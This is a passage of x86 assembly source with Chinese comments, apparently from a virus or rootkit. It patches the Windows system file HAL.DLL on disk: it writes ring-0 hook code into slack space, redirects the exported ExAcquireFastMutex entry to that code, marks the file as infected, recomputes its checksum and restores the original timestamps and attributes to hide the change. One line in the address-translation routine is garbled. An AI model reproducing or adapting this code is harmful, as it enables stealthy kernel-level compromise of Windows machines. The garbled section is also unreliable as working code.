mov eax,[eax+54h]
mov edx,@lpFileMap
add edx,eax
sub eax,@dwFileSize
neg eax ;调整搜索地址
push offset ring0apiend-offset ring0apistart
push eax
push edx
call _FindSpace ;在HAL.DLL的PE头之后开始搜索空间
.if eax
mov edi,eax
lea esi,ring0apistart[ebx]
mov ecx,offset ring0apiend-offset ring0apistart
rep movsb ;把HOOK代码写入HAL.DLL
push 2
push eax
push @lpFileMap
call _TranslateAddr ;HOOK代码的文件地址转换为虚拟地址
mov esi,eax
mov edx,@lpFileMap
mov dword ptr [edx+38h],''FGM''
add edx,[edx+3ch]
sub esi,[edx+34h]
mov ecx,[edx+78h]
push 3
push ecx
push @lpFileMap
call _TranslateAddr ;导出表的地址转换为文件地址
mov ecx,[eax+1ch]
push 3
push ecx
push @lpFileMap
call _TranslateAddr ;导出函数地址表的地址转换为文件地址,保存在EAX里
xchg esi,[eax] ;修改ExAcquireFastMutex()的入口地址为HOOK代码地址
push 2
push edi
push @lpFileMap
call _TranslateAddr ;HOOK代码执行完后要转到原来的ExAcquireFastMutex()继续执行,这里转换JMP指令的文件地址为虚拟地址
sub eax,[edx+34h]
sub esi,eax
mov [edi-4],esi ;地址差写入HOOK代码的最后的JMP指令处
mov dword ptr [edx+58h],0
push @dwFileSize
push @lpFileMap
call _CheckSum
mov [edx+58h],eax ;重新计算hal.dll的CHECKSUM值并填入PE头
.endif
.endif;''DLL''
.endif;''EP''
.endif;! ''FGM''
.endif;''ZM''
push @lpFileMap
call dwUnmapViewOfFile[ebx]
.endif
push @hFileMap
call dwCloseHandle[ebx]
.endif
lea eax,@stFileTime3
push eax
lea eax,@stFileTime2
push eax
lea eax,@stFileTime1
push eax
push @hFile
call dwSetFileTime[ebx]
.endif
push @hFile
call dwCloseHandle[ebx]
.endif
push @dwFileAttributes
push _lpFileName
call dwSetFileAttributesW[ebx]
.endif
popad
ret
_EditFile endp
;在PE文件里搜索连续为0的空间,函数返回值在EAX和EDX里
;out:eax=addr, edx=size
_FindSpace proc _StartAddress,_Size,_RequireSize
pushfd
push esi
push edi
cld
mov eax,_StartAddress
.if word ptr [eax]==''ZM''
add eax,[eax+3ch]
.if dword ptr [eax]==''EP''
movzx edx,word ptr [eax+14h]
add edx,18h
add edx,eax
sub edx,_StartAddress
sub _Size,edx
add _StartAddress,edx
.endif
.endif
mov edi,_StartAddress
mov ecx,_Size
shr ecx,2
xor eax,eax
@@:
repnz scasd
lea esi,[edi-4]
mov edx,esi
repz scasd
sub edx,edi
neg edx
sub edx,4
jecxz _FindSpace1
cmp edx,_RequireSize
jb @b
_FindSpace1:
.if edx>=_RequireSize
lea eax,[esi+4]
sub edx,4
.endif
pop edi
pop esi
popfd
ret
_FindSpace endp
;文件地址和虚拟地址相互转换的函数
;flag: bit0=0 文件地址转成虚拟地址; bit0=1 虚拟地址转成文件地址; bit1=0 正常转换; bit1=1 强制转换
_TranslateAddr proc _hModule,_Addr,_Flag
local @dwFlag
xor eax,eax
pushad
mov eax,_Flag
shr eax,1
mov @dwFlag,eax
and byte ptr _Flag,1
mov eax,_hModule
add eax,[eax+3ch]
movzx edx,word ptr [eax+14h]
add edx,18h
add edx,eax
mov ecx,_Addr
.if _Flag==0 && ecx>_hModule
sub ecx,_hModule
.elseif _Flag==1 && ecx>[eax+34h]
sub ecx,[eax+34h]
.endif
mov _Addr,ecx
.if ecx<[eax+54h]
.if _Flag==0
add ecx,[eax+34h]
.else
add ecx,_hModule
.endif
mov [esp+1ch],ecx
jmp _TranslateAddr1
.endif
movzx ecx,word ptr [eax+6]
.repeat
.if _Flag==0
mov esi,[edx+14h]
mov edi,[edx+10h]
add edi,esi
.else
mov esi,[edx+12]
mov edi,[edx+8]
add edi,esi
.endif
.if _Addr>=esi && _Addr .if !@dwFlag sub esi,_Addr .endif add edx,28h _TranslateAddr1:
test byte ptr [edx+27h],80h
.if !ZERO?
mov dword ptr [esp+1ch],-1
.break
.endif
.endif
neg esi
.if _Flag==0
add esi,[edx+12]
add esi,[eax+34h]
.else
add esi,[edx+14h]
add esi,_hModule
.endif
mov [esp+1ch],esi
.break
.break .if !ecx
.untilcxz
popad
ret
_TranslateAddr endp
